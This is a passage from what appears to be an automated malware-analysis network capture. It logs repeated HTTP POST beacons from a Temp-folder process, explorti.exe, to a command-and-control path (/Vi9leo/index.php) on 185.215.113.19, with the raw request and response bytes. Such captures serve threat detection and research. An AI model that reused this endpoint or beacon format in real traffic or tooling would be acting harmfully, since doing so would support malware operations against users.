Jul 27, 2024 04:50:26.128757000 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:26.882713079 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:26.883811951 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:27.132786989 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49756	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:27.253922939 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:28.021810055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:28.022893906 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:28.272988081 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49757	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:28.394347906 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:29.142203093 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:29.144819021 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:29.408874035 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49758	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:29.518965006 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:30.265858889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:30.266663074 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:30.515628099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49759	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:30.632292986 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:31.403126001 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:31.405514002 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:31.655787945 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49760	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:31.769231081 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:32.518279076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:32.519779921 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:32.767766953 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:32.879812956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:33.645919085 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:33.647157907 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:33.933999062 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49762	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:34.050268888 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:34.818154097 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:34.819289923 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:35.066618919 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49763	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:35.175261974 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:35.934223890 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:35.935643911 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:36.182477951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49764	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:36.300513983 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:37.067852974 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:37.068547964 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:37.319664955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49765	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:37.441212893 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:38.191942930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:38.192975998 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:38.438477039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49766	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:38.550211906 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:39.332725048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:39.335530043 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 04:50:39.588191032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49767	185.215.113.19	80	7756	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 04:50:39.706079960 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 04:50:40.506158113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 02:50:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 04:50:40.507093906 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
